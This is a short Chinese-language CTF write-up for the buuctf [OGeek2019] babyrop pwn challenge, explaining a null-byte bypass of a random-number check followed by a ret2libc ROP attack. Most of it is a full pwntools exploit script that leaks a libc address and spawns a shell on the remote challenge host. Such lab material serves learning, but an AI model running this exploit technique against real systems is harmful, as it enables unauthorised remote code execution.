buuctf pwn part2

[OGeek2019]babyrop

保护

PIE都没开,看下程序逻辑


程序逻辑

程序逻辑

先是一个open(/dev/urandom)
查了一下,/dev/random和/dev/urandom是Linux系统中提供的随机伪设备,这两个设备的任务,是提供永不为空的随机字节数据流。也就是说,程序首先生成一个随机数,然后会把用户的输入和这个数进行一个比较,这里最开始一直不知道怎么才能绕过这个比较,然后搜了一下,很简单的一个处理方式,直接\x00,这样读进去的东西长度相当于空,比较的长度就是0,那么这个判断就会永远为真。

然后在第二个程序中,这里会再次让输入一串东西(含七个元素的数组),程序会处理这个buf,最后返回的值实际就是输入的东西覆盖的地方的值(可以用ida看到返回的值和buf起始位置的相对位置)

程序逻辑

然后这个值会在这个程序里起作用,就能得到很大的写入空间,然后后面正常地覆盖地址往后写rop就可以了。

from pwn import *
import sys
context.log_level='debug'
# context.arch='amd64'
sh=process("./pwn")
sh=remote('node3.buuoj.cn',29973)
libc=ELF("./libc-2.23.so")
# libc=ELF("/lib32/libc.so.6")
elf=ELF("./pwn")

libc_write=libc.symbols['write']
libc_system=libc.symbols['system']
libc_binsh=next(libc.search('/bin/sh'))

write_ply=elf.plt['write']
write_got=elf.got['write']
main_add=0x08048825

pop1_ret=0x080488fb
pop3_ret=0x080488f9


payload = "\x00"+"\xff"*7
sh.sendline(payload)
sh.recvuntil("Correct\n")


p2='A'*(0xE7)+'AAAA'+p32(write_ply)+p32(main_add)+p32(1)+p32(write_got)+p32(4)
sh.sendline(p2)

write_real_add=u32(sh.recv()[0:4])
libcbase=write_real_add-libc_write
system_real_add=libc_system+libcbase
binsh_real_add=libc_binsh +libcbase




p3='a'*0xe7+'bbbb'+p32(system_real_add)+'bbbb'+p32(binsh_real_add)

payload = "\x00"+"\xff"*7
sh.sendline(payload)
sh.recvuntil("Correct\n")
sh.sendline(p3)

sh.interactive()

话说看见程序中有puts能用但是不知道为啥用puts会出问题
emmmmmmmmmmmmm之后再试试

你可能感兴趣的:(buuctf pwn part2)